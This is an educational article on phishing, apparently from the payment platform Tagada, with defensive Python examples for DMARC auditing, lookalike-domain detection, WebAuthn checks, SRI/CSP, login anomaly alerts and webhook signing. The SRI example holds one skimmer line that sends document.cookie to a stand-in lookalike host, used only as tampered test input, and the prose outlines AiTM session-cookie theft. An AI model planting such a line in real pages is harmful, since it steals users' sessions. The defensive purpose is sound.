How Phishing Works
Phishing attacks follow a predictable kill chain, but execution sophistication varies enormously — from mass-blasted, typo-ridden emails to meticulously crafted campaigns that fool security professionals. Understanding the mechanics helps merchants and developers build defenses at each step rather than relying on a single control.
Attacker selects a lure and target
The attacker chooses a trusted brand to impersonate — a payment processor, shipping carrier, bank, or the merchant's own domain — and identifies targets through data broker lists, LinkedIn scraping, or prior breach databases. High-value targets such as finance managers or platform administrators receive personalized lures referencing real context.
Infrastructure is staged
A lookalike domain (e.g. paypa1.com, secure-stripe-login.com) is registered, often just hours before the campaign launches. A TLS certificate is obtained, which takes minutes and costs nothing from an automated domain-validated CA, so the fake site shows the padlock icon that many users mistakenly equate with legitimacy. Hosting and email relays are set up in jurisdictions with limited enforcement cooperation.
Message is delivered
The phishing message arrives via email, SMS (smishing), voice call (vishing), or in-app notification. It creates urgency — "Your account will be suspended in 24 hours", "Verify your payout details now" — and includes a link or attachment. Legitimate-looking headers, logos, and formatting lower recipient suspicion.
Victim interacts with the payload
The victim clicks the link and lands on a cloned login page or a malware-delivering document. Credentials, card numbers, or one-time codes entered on the fake page are captured in real time. Some kits go further and run a reverse proxy that relays every request to the real site, so the victim completes the genuine SMS or app-based MFA step while the attacker captures the resulting session cookie; this defeats any second factor that is not bound to the site's origin.
Credentials are monetized
Stolen data is put to use immediately: credentials are replayed against the platform they were phished from and, through credential stuffing, against other services where the victim reused the same password, or they are sold in bulk on dark-web markets. In payment contexts this means unauthorized purchases, fraudulent fund transfers, account takeover, or resale of card data for card-not-present fraud. The window between credential capture and the first fraudulent transaction is often under 15 minutes.
Why Phishing Matters
Phishing is not a niche threat — it is the dominant initial access vector for both consumer fraud and enterprise breaches. For payment businesses, the stakes are compounded by regulatory obligations, chargeback liability, and reputational damage when customers see their payment provider's brand used in an attack.
The FBI's Internet Crime Complaint Center (IC3) consistently ranks phishing as the most reported cybercrime category. In its 2023 report, phishing accounted for over 298,000 complaints in the United States alone, with adjusted losses exceeding $18.7 million recorded under its phishing/spoofing category. When downstream fraud (account takeover, BEC, fraudulent transfers) is included, the total economic impact runs into the billions annually.
Verizon's 2024 Data Breach Investigations Report found that phishing was involved in 14% of all breaches analyzed globally, making it the second-most common attack pattern after stolen credential use — categories that are themselves tightly coupled, since phishing is the primary source of those stolen credentials. For the financial services and retail verticals specifically, phishing and social engineering together account for the majority of confirmed data disclosure events.
Payment-specific exposure
Merchants are targeted not only as victims but as infrastructure. Fraudsters register domains that spoof your checkout or support portal to phish your customers — damage that falls on your brand even when your own systems are never breached.
Phishing vs. Business Email Compromise
Phishing and Business Email Compromise are closely related but operate at different layers of sophistication and target different outcomes.
| Dimension | Phishing | Business Email Compromise (BEC) |
|---|---|---|
| Primary goal | Steal credentials or card data at scale | Redirect payments or authorize fraudulent transfers |
| Targeting | Broad (mass) or semi-targeted | Highly targeted (executives, finance, AP teams) |
| Delivery | Fake links, attachments, cloned pages | Compromised or spoofed email thread hijacking |
| Technical complexity | Low to medium | Medium to high |
| Average loss per incident | Lower (individual account) | Very high (roughly $137,000 per BEC complaint on average, derived from FBI IC3 2023 totals) |
| Detection signal | Suspicious URL, sender domain mismatch | Subtle thread context, account number change |
| Primary defense | MFA, URL filtering, security awareness | Out-of-band payment verification, strict approval workflows |
Both attacks exploit trust — phishing exploits brand trust, BEC exploits organizational trust. Defenses should address both layers.
Types of Phishing
Phishing is not a single technique. Attackers adapt the channel and targeting to maximize their success rate against specific victim profiles, including ecommerce shoppers, payment platform users, and merchant back-office staff.
Deceptive phishing is the classic variant: bulk emails impersonating a well-known brand with a malicious link. Volume compensates for low click rates.
Spear phishing is personalized using open-source intelligence. Messages reference the victim's employer, role, recent transactions, or colleagues. Click rates are dramatically higher than bulk campaigns.
Smishing (SMS phishing) exploits the high open rates of text messages. Fake delivery notifications ("Your parcel is held — verify your address") are common in ecommerce contexts and often harvest card details under the guise of re-delivery fees.
Vishing (voice phishing) uses phone calls, often with spoofed caller ID, to impersonate bank fraud departments or payment processors and extract OTPs or card verification codes in real time.
Pharming compromises DNS resolution (a poisoned resolver, a hijacked router's DNS settings, or an edited hosts file) to redirect requests for the legitimate domain to attacker-controlled servers, so the victim reaches the fake site without ever clicking a link. HTTPS still helps here: unless the attacker also holds a certificate for the real domain, the browser warns about the fake site's certificate.
Adversary-in-the-Middle (AiTM) phishing uses a reverse proxy to relay the login session to the real site in real time, capturing the session cookie after MFA completes. It defeats SMS, TOTP and push-approval second factors alike; only origin-bound credentials such as FIDO2/WebAuthn passkeys resist it, because the browser will not release them to a lookalike origin.
Best Practices
Technical controls and human training are both necessary. Phishing succeeds when either layer is absent.
For Merchants
Publish and enforce a strict DMARC policy (p=reject) alongside SPF and DKIM records for every domain you own, including dormant ones. Attackers frequently abuse unused subdomains and parked domains that have no email authentication policy. For a domain that never sends mail, publish SPF "v=spf1 -all" and DMARC "v=DMARC1; p=reject" so that anything claiming to come from it is rejected outright.
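The following script is an added example, not Tagada's code, showing how to audit SPF and DMARC across an inventory of domains and what to publish for a parked one. The TXT records are constructed inline rather than resolved; swap lookup_txt for a real DNS query. The domain names and report mailbox are assumptions.

```python
"""Evaluate SPF and DMARC records for the domains a merchant owns.

Added example (not Tagada's code). The TXT records below are constructed;
a real run would resolve TXT at <domain> and at _dmarc.<domain> instead.
"""
import re

# Constructed records: one sending domain configured correctly, one with a
# monitoring-only policy, and one parked domain with no records at all.
CONSTRUCTED_TXT = {
    "shop.example": ["v=spf1 include:_spf.mail-provider.example -all"],
    "_dmarc.shop.example": [
        "v=DMARC1; p=reject; rua=mailto:dmarc@shop.example; adkim=s; aspf=s"
    ],
    "promo.example": ["v=spf1 include:_spf.mail-provider.example ~all"],
    "_dmarc.promo.example": ["v=DMARC1; p=none; rua=mailto:dmarc@promo.example"],
    "old-brand.example": [],
    "_dmarc.old-brand.example": [],
}


def lookup_txt(name, records=CONSTRUCTED_TXT):
    """Stand-in for a DNS TXT query against the constructed zone data."""
    return records.get(name, [])


def spf_all_qualifier(txt):
    """Return the qualifier on the 'all' mechanism: '+', '-', '~', '?' or None."""
    qualifier = None
    for term in txt.split()[1:]:
        m = re.fullmatch(r"([+\-~?]?)all", term, re.IGNORECASE)
        if m:
            qualifier = m.group(1) or "+"   # a bare 'all' means +all
    return qualifier


def parse_dmarc(txt):
    """Parse 'v=DMARC1; p=...; ...' into a dict of lower-cased tags."""
    tags = {}
    for part in txt.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_domain(domain, records=CONSTRUCTED_TXT):
    """Return a list of weaknesses; an empty list means SPF and DMARC enforce."""
    findings = []
    spf = [r for r in lookup_txt(domain, records) if r.lower().startswith("v=spf1")]
    if not spf:
        findings.append("no SPF record: any host may send as this domain")
    elif len(spf) > 1:
        findings.append("multiple SPF records: receivers treat this as permerror")
    else:
        q = spf_all_qualifier(spf[0])
        if q in (None, "+"):
            findings.append("SPF does not fail unlisted senders (missing or +all)")
        elif q == "~":
            findings.append("SPF uses ~all (softfail) instead of -all")
        elif q == "?":
            findings.append("SPF uses ?all (neutral) instead of -all")

    dmarc = [r for r in lookup_txt("_dmarc." + domain, records)
             if r.upper().startswith("V=DMARC1")]
    if not dmarc:
        findings.append("no DMARC record: SPF/DKIM failures are not enforced")
    else:
        tags = parse_dmarc(dmarc[0])
        policy = tags.get("p", "").lower()
        if policy != "reject":
            findings.append(f"DMARC p={policy or 'missing'}: spoofed mail is still delivered")
        if tags.get("pct", "100") != "100":
            findings.append(f"DMARC pct={tags['pct']}: policy applied to only part of the mail")
        if "rua" not in tags:
            findings.append("no rua= address: you receive no aggregate reports")
    return findings


def parked_domain_records(domain, report_to="dmarc@shop.example"):
    """Records to publish for a domain that must never send mail. Reports go to a
    mailbox on a live domain; that domain must publish an authorization record
    (<parked>._report._dmarc.<report domain>) for external destinations."""
    return {
        domain: "v=spf1 -all",
        "_dmarc." + domain: "v=DMARC1; p=reject; rua=mailto:" + report_to,
    }


if __name__ == "__main__":
    for d in ("shop.example", "promo.example", "old-brand.example"):
        print(d, assess_domain(d) or ["ok"])
    print(parked_domain_records("old-brand.example"))
```

Run it against your full domain inventory, not just the primary brand: the parked and dormant domains are the ones that come back with the "no SPF record" and "no DMARC record" findings.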
Monitor certificate transparency logs for lookalike domains (e.g. yourstore-support.com, yourstore-payments.com) using free services or commercial brand protection tools. Early detection allows you to report and take down phishing infrastructure before campaigns launch.
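As an added example (not Tagada's or any tool's code), here is the core of a lookalike detector that can run over certificate transparency output; it covers both the lookalike domains described in the kill chain above and the monitoring recommended here. The entries are constructed in the shape crt.sh returns, where "name_value" holds newline-separated subject alternative names; the brand name, own-domain list, confusable table and thresholds are assumptions to adapt.

```python
"""Flag lookalike domains in certificate transparency output.

Added example (not Tagada's code). The CT entries are constructed in the
shape crt.sh returns ("name_value" holds newline-separated SANs); the brand
name, own-domain list and thresholds are assumptions to adapt.
"""
import json
import re

BRAND = "yourstore"
OWN_DOMAINS = {"yourstore.com"}          # assumption: the merchant's real domains

CONSTRUCTED_CT_ENTRIES = json.dumps([
    {"name_value": "yourstore.com\nwww.yourstore.com", "not_before": "2024-03-01T10:00:00"},
    {"name_value": "yourstore-support.com", "not_before": "2024-05-02T03:14:00"},
    {"name_value": "*.y0urstore.net", "not_before": "2024-05-02T03:20:00"},
    {"name_value": "yourst0re-payments.com", "not_before": "2024-05-02T04:01:00"},
    {"name_value": "yourstroe.com", "not_before": "2024-05-03T11:45:00"},
    {"name_value": "mystore.com", "not_before": "2024-05-03T12:00:00"},
    {"name_value": "blog.example.org", "not_before": "2024-05-03T12:30:00"},
])

# Visually confusable substitutions attackers use in ASCII-only domains.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"),
               ("5", "s"), ("7", "t")]


def fold_confusables(label):
    """Map digits and letter pairs to the letters they imitate."""
    for fake, real in CONFUSABLES:
        label = label.replace(fake, real)
    return label


def levenshtein(a, b):
    """Edit distance with insert/delete/substitute, O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(hostname):
    """Second-level label of a hostname. Assumes a single-label TLD; real code
    should consult the public suffix list (e.g. for co.uk)."""
    host = hostname.strip().lower().lstrip("*.")
    parts = host.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify(hostname, brand=BRAND, own=OWN_DOMAINS):
    """Return a reason string if hostname looks like it impersonates brand, else None."""
    host = hostname.strip().lower().lstrip("*.")
    if host in own or any(host.endswith("." + d) for d in own):
        return None
    label = registrable_label(host)
    folded = fold_confusables(label)
    if brand in label:
        return "brand-embedded"          # e.g. yourstore-support
    if brand in folded:
        return "homoglyph"               # e.g. y0urstore
    threshold = 1 if len(brand) < 6 else 2
    tokens = re.split(r"[-_]", folded)
    if min(levenshtein(t, brand) for t in tokens) <= threshold:
        return "typosquat"               # e.g. yourstroe
    return None


def scan_ct_entries(raw_json):
    """Deduplicate SANs across entries and return [(hostname, reason, not_before)]."""
    hits, seen = [], set()
    for entry in json.loads(raw_json):
        for name in entry["name_value"].split("\n"):
            name = name.strip().lower()
            if name in seen:
                continue
            seen.add(name)
            reason = classify(name)
            if reason:
                hits.append((name, reason, entry.get("not_before")))
    return hits


if __name__ == "__main__":
    for hit in scan_ct_entries(CONSTRUCTED_CT_ENTRIES):
        print(hit)
```

The not_before timestamp is worth keeping on each hit: a certificate issued in the last few hours for a brand-embedded name is the strongest signal that a campaign is about to launch, which is exactly the window in which a takedown request is cheapest.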
Enforce phishing-resistant MFA — FIDO2/passkeys or hardware security keys — on your payment dashboard, admin portal, and any system with access to settlement accounts. SMS OTP is insufficient against AiTM kits.
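To make concrete why FIDO2/passkeys survive the reverse-proxy attack described under AiTM phishing above and recommended against here, the following added example (not Tagada's or any library's code) walks through the relying-party checks a server performs on a WebAuthn assertion, following the verification steps in section 7.2 of the WebAuthn specification. It constructs three assertions: a legitimate one, one produced while the victim is on an AiTM proxy's origin, and one where the proxy forges the origin string. The RP id, allowed origins and proxy hostname are assumptions; the final signature check over authenticatorData || SHA-256(clientDataJSON), which needs the public key stored at registration, is not shown.

```python
"""Relying-party checks that make WebAuthn (FIDO2/passkeys) resist AiTM relays.

Added example (not Tagada's or any library's code). It follows the assertion
verification steps in the WebAuthn spec (section 7.2): clientDataJSON type,
challenge and origin, then authenticatorData rpIdHash and flags. The final
signature check over authenticatorData || SHA-256(clientDataJSON) needs the
public key stored at registration and is not shown. RP id, origins and the
proxy hostname are assumptions.
"""
import base64
import hashlib
import json
import os
import struct

RP_ID = "yourstore.com"                                   # assumption
ALLOWED_ORIGINS = {"https://yourstore.com", "https://account.yourstore.com"}


def b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def browser_assertion(challenge, origin, rp_id):
    """What a browser and authenticator would emit (constructed; no real key).
    The browser writes the page origin into clientDataJSON itself; script on
    the page cannot change it, and the authenticator hashes the RP id. A real
    browser refuses the ceremony outright when rp_id is not a registrable
    suffix of the origin; this simulation lets it through to show each check."""
    client_data = {"type": "webauthn.get", "challenge": b64url(challenge),
                   "origin": origin, "crossOrigin": False}
    client_data_json = json.dumps(client_data, separators=(",", ":")).encode()
    flags = 0x05                                           # UP | UV
    auth_data = (hashlib.sha256(rp_id.encode()).digest()   # rpIdHash (32 bytes)
                 + bytes([flags]) + struct.pack(">I", 7))  # flags, signCount
    return {"clientDataJSON": client_data_json, "authenticatorData": auth_data}


def verify_assertion(assertion, expected_challenge, rp_id=RP_ID, allowed_origins=ALLOWED_ORIGINS):
    """Return (ok, reason). Each failure is one spec step a relaying proxy cannot satisfy."""
    try:
        cd = json.loads(assertion["clientDataJSON"])
    except ValueError:
        return False, "clientDataJSON is not valid JSON"
    if cd.get("type") != "webauthn.get":
        return False, "wrong ceremony type"
    if b64url_decode(cd.get("challenge", "")) != expected_challenge:
        return False, "challenge mismatch (replayed or cross-session assertion)"
    if cd.get("origin") not in allowed_origins:
        return False, f"origin {cd.get('origin')!r} is not an allowed origin"
    ad = assertion["authenticatorData"]
    if len(ad) < 37:
        return False, "authenticatorData too short"
    if ad[:32] != hashlib.sha256(rp_id.encode()).digest():
        return False, "rpIdHash does not match the relying party id"
    if not ad[32] & 0x01:
        return False, "user presence flag not set"
    # Next step (not shown): verify the signature with the credential's public key.
    return True, "ok"


def run_scenarios(proxy_host="yourstore-login.example"):
    """Legitimate login, an AiTM relay, a relay that forges the origin string,
    and a stale assertion replayed against a fresh challenge."""
    challenge = os.urandom(32)                             # server stores this per attempt
    legit = browser_assertion(challenge, "https://yourstore.com", RP_ID)
    # AiTM: the victim's browser is on the proxy's origin, so that is what gets recorded.
    relayed = browser_assertion(challenge, "https://" + proxy_host, proxy_host)
    # Even if the proxy rewrote the origin field, the authenticator's rpIdHash differs.
    forged = browser_assertion(challenge, "https://yourstore.com", proxy_host)
    stale = browser_assertion(os.urandom(32), "https://yourstore.com", RP_ID)
    return {
        "legitimate": verify_assertion(legit, challenge),
        "aitm_relay": verify_assertion(relayed, challenge),
        "forged_origin": verify_assertion(forged, challenge),
        "stale_challenge": verify_assertion(stale, challenge),
    }


if __name__ == "__main__":
    for name, result in run_scenarios().items():
        print(f"{name}: {result}")
```

Contrast this with an OTP: a six-digit code carries no information about where it was typed, so the proxy simply forwards it. The WebAuthn assertion carries the origin and the RP id hash inside the signed data, which is why phishing-resistant MFA is the right requirement for dashboards and settlement-account access.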
Train staff on payment change requests: any request to update a bank account number, payout destination, or supplier payment detail should require out-of-band verbal confirmation with a known contact, regardless of how legitimate the email appears.
Subscribe to takedown services or work with your payment provider to have phishing pages impersonating your brand removed quickly. Speed matters — the median phishing page is live for under 24 hours.
For Developers
Implement Content Security Policy (CSP) headers on your checkout pages to restrict where scripts, frames and form submissions may go (script-src, frame-src, form-action, base-uri). An injected script, or a form rewritten to post card details to an attacker's domain, is then blocked by the browser, which reduces the value of compromising your domain to host phishing content.
Use subresource integrity (SRI) checks on third-party scripts loaded in checkout flows. A compromised CDN script is a supply-chain variant of the same attack: it skims card data from your genuine payment page, so the victim never has to leave your domain. SRI makes the browser refuse a script whose content no longer matches the pinned hash.
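The following added example (not Tagada's code) shows the two controls from the preceding paragraphs at build time: it computes SRI integrity values the way browsers check them, lints a checkout page's third-party assets so a script that changed upstream fails the build, and assembles a CSP header with the directives that matter for a payment page. The script bodies and hostnames are constructed stand-ins.

```python
"""Compute Subresource Integrity values and a Content Security Policy for a
checkout page.

Added example (not Tagada's code). The script bodies are constructed stand-ins
for files fetched from a CDN at build time; the hostnames in the CSP are
assumptions.
"""
import base64
import hashlib

SRI_ALGORITHMS = {"sha256": 1, "sha384": 2, "sha512": 3}   # spec strength order


def sri_hash(content: bytes, alg: str = "sha384") -> str:
    """integrity value for content: '<alg>-<base64 digest>'."""
    if alg not in SRI_ALGORITHMS:
        raise ValueError("unsupported SRI algorithm: " + alg)
    return alg + "-" + base64.b64encode(hashlib.new(alg, content).digest()).decode()


def sri_matches(content: bytes, integrity: str) -> bool:
    """Apply the browser's rule: of the strongest algorithm listed, at least one
    digest must match. Unparseable metadata is ignored by browsers, which is why
    lint_checkout_assets below also requires that some valid hash be present."""
    parsed = []
    for token in integrity.split():
        alg, sep, digest = token.partition("-")
        if sep and alg in SRI_ALGORITHMS:
            parsed.append((alg, digest.split("?", 1)[0]))   # options after '?' ignored
    if not parsed:
        return True                  # no valid metadata: browsers load the resource
    strongest = max(SRI_ALGORITHMS[a] for a, _ in parsed)
    return any(sri_hash(content, a) == a + "-" + d
               for a, d in parsed if SRI_ALGORITHMS[a] == strongest)


def script_tag(src: str, content: bytes) -> str:
    """Emit the tag with integrity pinned; crossorigin is required for CDN scripts."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            'crossorigin="anonymous"></script>')


def build_csp(script_hosts, frame_hosts, form_targets, report_uri=None):
    """CSP for a checkout page: scripts only from self and pinned hosts, no
    plugins, no <base> hijack, forms may post only to known targets, and the
    page cannot be framed by a phishing site."""
    directives = [
        "default-src 'self'",
        ("script-src 'self' " + " ".join(script_hosts)).strip(),
        "object-src 'none'",
        "base-uri 'self'",
        "frame-src " + (" ".join(frame_hosts) if frame_hosts else "'none'"),
        ("form-action 'self' " + " ".join(form_targets)).strip(),
        "frame-ancestors 'none'",
    ]
    if report_uri:
        directives.append("report-uri " + report_uri)
    return "; ".join(directives)


def lint_checkout_assets(assets):
    """assets: list of (src, content, integrity). Fails the build for any
    third-party script without valid SRI or whose content no longer matches."""
    problems = []
    for src, content, integrity in assets:
        if not any(t.partition("-")[0] in SRI_ALGORITHMS for t in integrity.split()):
            problems.append(f"{src}: no valid integrity metadata")
        elif not sri_matches(content, integrity):
            problems.append(f"{src}: content does not match integrity (changed upstream?)")
    return problems


if __name__ == "__main__":
    ORIGINAL = b"window.checkout = { tokenise: function (card) { /* ... */ } };"   # constructed
    TAMPERED = ORIGINAL + b"fetch('https://yourstore-payments.example/c?d='+document.cookie);"
    print(script_tag("https://cdn.example/checkout.js", ORIGINAL))
    print(build_csp(["https://cdn.example"], ["https://3ds.acquirer.example"],
                    ["https://checkout.yourstore.com"]))
    print(lint_checkout_assets([("https://cdn.example/checkout.js", TAMPERED,
                                 sri_hash(ORIGINAL))]))
```

Note the form-action directive: a skimmer or injected markup that changes the card form's destination is stopped even when the script that did it slipped through, and frame-ancestors 'none' keeps a phishing page from embedding your real checkout to borrow its look.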
Log and alert on unusual admin activity: new API key creation, changes to webhook endpoints, and payout account updates should trigger immediate review. These actions are the downstream goal of credential phishing targeting your platform.
Build anomaly detection into authentication flows: impossible travel, new device + new IP + high-value action in the same session, and rapid credential validation attempts are all phishing-correlated signals worth surfacing to your fraud operations team.
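The two preceding paragraphs describe signals rather than rules, so here is an added example (not Tagada's code) that turns them into detection logic run over a constructed audit log: impossible travel between successive logins, a high-value action from a session whose device and IP were both unseen for that user, and a burst of login attempts from one IP. The log format, the seeded device and IP history, and the thresholds are assumptions; IP geolocation is assumed to have been done upstream.

```python
"""Phishing-correlated signals in authentication and admin logs.

Added example (not Tagada's code). The events are constructed JSON lines with
the fields a login/admin audit log would carry; geolocation of each IP is
assumed to have been done upstream (lat/lon on the event). Thresholds are
assumptions to tune.
"""
import json
import math
from collections import defaultdict, deque
from datetime import datetime

HIGH_VALUE_ACTIONS = {"payout_account_update", "webhook_endpoint_update", "api_key_create"}
MAX_SPEED_KMH = 900          # faster than a commercial flight
RAPID_WINDOW_S = 60
RAPID_THRESHOLD = 5

# Constructed log: a London login, a New York login 20 minutes later from a new
# device and IP, a payout change from that session, then a burst from one IP.
CONSTRUCTED_LOG = """\
{"ts":"2024-05-01T09:00:00Z","user":"alice","event":"login","result":"success","ip":"203.0.113.10","device":"dev-a1","lat":51.51,"lon":-0.13}
{"ts":"2024-05-01T09:20:00Z","user":"alice","event":"login","result":"success","ip":"198.51.100.7","device":"dev-z9","lat":40.71,"lon":-74.01}
{"ts":"2024-05-01T09:22:00Z","user":"alice","event":"payout_account_update","ip":"198.51.100.7","device":"dev-z9"}
{"ts":"2024-05-01T09:30:00Z","user":"bob","event":"login","result":"failure","ip":"192.0.2.55","device":"dev-q1"}
{"ts":"2024-05-01T09:30:08Z","user":"carol","event":"login","result":"failure","ip":"192.0.2.55","device":"dev-q1"}
{"ts":"2024-05-01T09:30:15Z","user":"dave","event":"login","result":"success","ip":"192.0.2.55","device":"dev-q1","lat":37.77,"lon":-122.42}
{"ts":"2024-05-01T09:30:21Z","user":"erin","event":"login","result":"failure","ip":"192.0.2.55","device":"dev-q1"}
{"ts":"2024-05-01T09:30:29Z","user":"frank","event":"login","result":"failure","ip":"192.0.2.55","device":"dev-q1"}
"""

# Seeded history: devices and IPs each user has authenticated from before.
KNOWN_DEVICES = {"alice": {"dev-a1"}}
KNOWN_IPS = {"alice": {"203.0.113.10"}}


def parse_ts(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points on a 6371 km sphere."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlam = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def detect(log_text, known_devices=KNOWN_DEVICES, known_ips=KNOWN_IPS):
    """Return alerts in the order they fire while replaying the log."""
    devices = defaultdict(set, {u: set(s) for u, s in known_devices.items()})
    ips = defaultdict(set, {u: set(s) for u, s in known_ips.items()})
    last_login = {}                       # user -> (time, lat, lon)
    fresh_sessions = set()                # (user, device, ip) that were new at login
    attempts = defaultdict(deque)         # ip -> timestamps of recent login attempts
    rapid_flagged = set()
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        t, user, ip, dev = parse_ts(e["ts"]), e["user"], e["ip"], e["device"]
        if e["event"] == "login":
            q = attempts[ip]
            q.append(t)
            while (t - q[0]).total_seconds() > RAPID_WINDOW_S:
                q.popleft()
            if len(q) >= RAPID_THRESHOLD and ip not in rapid_flagged:
                rapid_flagged.add(ip)      # one alert per IP, not one per attempt
                alerts.append({"rule": "rapid_attempts", "ip": ip, "count": len(q)})
            if e.get("result") != "success":
                continue
            if dev not in devices[user] and ip not in ips[user]:
                fresh_sessions.add((user, dev, ip))
            if user in last_login and "lat" in e:
                t0, lat0, lon0 = last_login[user]
                hours = (t - t0).total_seconds() / 3600
                km = haversine_km(lat0, lon0, e["lat"], e["lon"])
                # km > 50 tolerates geo-IP jitter; max() guards a zero time delta
                if km > 50 and km / max(hours, 1e-6) > MAX_SPEED_KMH:
                    alerts.append({"rule": "impossible_travel", "user": user,
                                   "km": round(km), "minutes": round(hours * 60)})
            if "lat" in e:
                last_login[user] = (t, e["lat"], e["lon"])
            devices[user].add(dev)
            ips[user].add(ip)
        elif e["event"] in HIGH_VALUE_ACTIONS and (user, dev, ip) in fresh_sessions:
            alerts.append({"rule": "new_device_ip_high_value", "user": user,
                           "action": e["event"], "ip": ip})
    return alerts


if __name__ == "__main__":
    for alert in detect(CONSTRUCTED_LOG):
        print(alert)
```

The second rule is the one that matters most for payouts: a login from a never-seen device and IP is noisy on its own, but the same session changing a payout account within minutes is the exact sequence an AiTM kit operator produces after capturing a session, and it deserves a hold on the change rather than just an alert.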
Consider integrating identity fraud checks at account creation and payment method addition to catch compromised identities before they complete transactions.
Common Mistakes
Even security-conscious teams make predictable errors when addressing phishing risk.
Treating security awareness training as a one-time event. Annual phishing simulations produce compliance metrics, not behavioral change. Effective programs run frequent, varied simulations with immediate feedback and track improvement over time.
Conflating a padlock icon with safety. A large proportion of phishing sites now use HTTPS. Communicating to customers and staff that "look for the padlock" is sufficient guidance actively increases vulnerability, because attackers routinely obtain valid TLS certificates for their lookalike domains.
Stopping at email. Phishing now arrives via SMS, voice, social media DMs, QR codes, and even in-app messaging. Defenses focused exclusively on email filtering miss a large part of the modern attack surface.
Relying solely on SMS OTP for MFA. Reverse-proxy phishing kits defeat SMS-based (and equally TOTP and push-based) two-factor authentication in real time. Phishing-resistant MFA, meaning FIDO2/WebAuthn passkeys or hardware keys, is the control that closes this gap at the authentication layer: the credential is bound to your site's origin, so a proxy on a lookalike domain cannot complete the ceremony or reuse its result.
Failing to monitor for brand abuse. Merchants often only discover that their domain or logo is being used in phishing campaigns when customers complain. Proactive monitoring and takedown reduces the window of exposure and the associated chargeback and reputational risk.
Phishing and Tagada
Tagada is a payment orchestration platform — your payment dashboard, webhook configurations, and settlement account details are high-value phishing targets for attackers seeking to redirect merchant payouts or compromise customer payment data.
Protect your Tagada account
Enable passkey or hardware security key authentication on your Tagada portal. Any change to payout bank accounts or webhook endpoints triggers a review notification — treat unexpected notifications as a potential indicator of compromise and verify out-of-band before approving. If you suspect your credentials have been phished, contact Tagada support immediately to freeze API keys and audit recent configuration changes.
Tagada's platform logs all administrative actions with timestamps and IP addresses. If your team receives a suspicious email appearing to come from Tagada requesting credential re-verification or payment detail updates, do not click any links — Tagada will never ask for your password or full card details via email. Report suspected impersonation of the Tagada brand to your account manager so the phishing infrastructure can be identified and reported for takedown. Connecting account takeover prevention controls at the orchestration layer — such as IP allowlisting for API access and webhook signature verification — adds defense-in-depth that limits the blast radius if credentials are ever compromised through a phishing attack.
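The paragraph above names two controls that limit blast radius, webhook signature verification and IP allowlisting for API access. The following is an added example of both and is not Tagada's documented scheme: it assumes a generic HMAC-SHA256 format with a header of the form "X-Signature: t=<unix seconds>,v1=<hex>" computed over "<t>.<raw body>", a per-endpoint secret, and a set of allowed source ranges. Adapt the header parsing and secret handling to whatever your provider actually specifies.

```python
"""Webhook signature verification and API source-IP allowlisting.

Added example (not Tagada's documented scheme). It assumes a generic
HMAC-SHA256 format: header "X-Signature: t=<unix seconds>,v1=<hex>" computed
over "<t>.<raw body>"; adapt the header parsing and secret to your provider.
"""
import hashlib
import hmac
import ipaddress
import time

WEBHOOK_SECRET = b"whsec_constructed_example_only"       # assumption: per-endpoint secret
TOLERANCE_S = 300                                         # reject timestamps older than this
API_ALLOWLIST = [ipaddress.ip_network("203.0.113.0/24"),  # assumption: your egress ranges
                 ipaddress.ip_network("2001:db8:10::/48")]


def sign(body: bytes, ts: int, secret: bytes = WEBHOOK_SECRET) -> str:
    """What the sender puts in the header (used here to build test input)."""
    mac = hmac.new(secret, str(ts).encode() + b"." + body, hashlib.sha256).hexdigest()
    return f"t={ts},v1={mac}"


def verify_webhook(body: bytes, header: str, secret=WEBHOOK_SECRET, now=None, tolerance=TOLERANCE_S):
    """Return (ok, reason). Verify over the raw bytes received, never over a
    re-serialised copy, and compare in constant time."""
    fields = dict(p.split("=", 1) for p in header.split(",") if "=" in p)
    try:
        ts = int(fields.get("t", ""))
    except ValueError:
        return False, "missing or malformed timestamp"
    now = int(time.time()) if now is None else now
    if abs(now - ts) > tolerance:
        return False, "timestamp outside tolerance (replay?)"
    expected = hmac.new(secret, str(ts).encode() + b"." + body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, fields.get("v1", "")):
        return False, "signature mismatch"
    return True, "ok"


def is_allowed_source(ip_text: str, allowlist=API_ALLOWLIST) -> bool:
    """Check the TCP peer address; trust X-Forwarded-For only when your own
    proxy sets it. Version mismatches (v4 address, v6 network) compare False."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return any(ip in net for net in allowlist)


def handle_webhook(body: bytes, header: str, peer_ip: str, now=None):
    """Gate used by the HTTP handler: both checks must pass before the body is parsed."""
    if not is_allowed_source(peer_ip):
        return False, f"source {peer_ip} not in allowlist"
    return verify_webhook(body, header, now=now)


if __name__ == "__main__":
    body = b'{"event":"payout.updated","payout_account":"GB00BANK00000000"}'   # constructed
    now = int(time.time())
    print(handle_webhook(body, sign(body, now), "203.0.113.9", now))                    # ok
    print(handle_webhook(body.replace(b"GB00", b"GB99"), sign(body, now), "203.0.113.9", now))
    print(handle_webhook(body, sign(body, now - 3600), "203.0.113.9", now))             # stale
    print(handle_webhook(body, sign(body, now), "198.51.100.1", now))                   # wrong source
```

Two details matter for the phishing case specifically. The timestamp window stops a captured webhook from being replayed later to re-trigger a payout change, and constant-time comparison prevents an attacker who has guessed the endpoint from recovering a valid signature byte by byte. Neither check helps if the secret itself is phished, which is why the secret belongs in a vault or environment variable and not in a document a lure can ask for.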